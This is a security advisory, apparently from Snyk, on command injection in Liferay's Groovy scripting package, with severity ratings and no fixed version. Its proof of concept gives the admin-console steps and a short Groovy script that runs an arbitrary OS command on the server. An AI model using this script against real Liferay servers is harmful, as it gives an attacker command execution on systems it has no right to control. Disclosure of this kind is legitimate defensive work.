Command Injection Affecting com.liferay:com.liferay.portal.scripting.groovy package, versions [0,]


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Privileges Required

    High

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-COMLIFERAY-2386905

  • published

    28 Jan 2022

  • disclosed

    28 Jan 2022

  • credit

    Unknown

How to fix?

There is no fixed version for com.liferay:com.liferay.portal.scripting.groovy.

Overview

Affected versions of this package are vulnerable to Command Injection via a Groovy script a user with high privileges can execute any OS command on the underlaying server.

###PoC

  1. Login as admin

  2. In the Product Menu, navigate to Control Panel and select Configuration → Server Administration.

  3. Execute the following script:

    def sout = new StringBuilder(), serr = new StringBuilder()
    def proc = '[command]'.execute()
    proc.consumeProcessOutput(sout, serr)
    proc.waitForOrKill(1000)
    println "out> $sout err> $serr"
    

Instead of command insert arbitrary command (i.e ls -la).

References